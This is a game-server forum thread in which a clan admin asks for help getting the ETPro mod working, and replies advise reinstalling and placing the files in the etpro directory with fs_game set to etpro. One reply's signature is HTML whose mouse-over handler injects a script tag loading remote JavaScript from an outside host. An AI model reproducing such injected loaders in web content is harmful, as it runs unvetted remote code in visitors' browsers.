Help Setting Up My Server

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

TX-Chante

Help Setting Up My Server

Post by TX-Chante »

Hi. I'm the admin for TX Clan. I am trying to install ET Pro on our server. I'm having some difficulties as it's not working correctly. I have uploaded all the files and it says it's et pro running, but some of the ET Pro stuff isn't working, like the b_althud command. I'd also like to be able to load up for TWL settings and I see no way to do that as well. I've been struggling with getting this to work correctly for 2 days. Any assistance in getting our server set up correctly would be greatly appreciated as our clan is very anxious to run this mod.
Smokey

Post by Smokey »

I also had a few issues with b_althud not working (also multiview) when first I uploaded and ran with etpro.

I can heartily recommend a re-install (or re-ftp from a clean local install) although time consuming it certainly pays off.

I suspect the root cause in my case may have been a rogue shrub game file in ..../etmain/ as my housekeeping was not quite as good as it ought to have been.

Still a lesson learnt for me and maybe a route of investigation for you.

Smokey.
Rain

Post by Rain »

Chances are that you have etpro installed in the etmain directory vs. the etpro directory. The etpro files need to be in the etpro directory, and the server's fs_game needs to be set to etpro.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
buzzbomb

Post by buzzbomb »

I had a similar problem, and thanks to "gotenks," and a couple of others here in the forums, I can get ETPro to start.

Decompress ETPro into the Enemy Territory Folder, but NOT in the etmain folder. Then set your command line to "c:/programs/enemyterritory/etmain.exe" +set fs_game etpro

obviously, your path might be different, but just make sure that the line +set fs_game etpro is OUTSIDE of the quotes. *Thanks again to gotenks! :thumbup:

=|= buzzbomb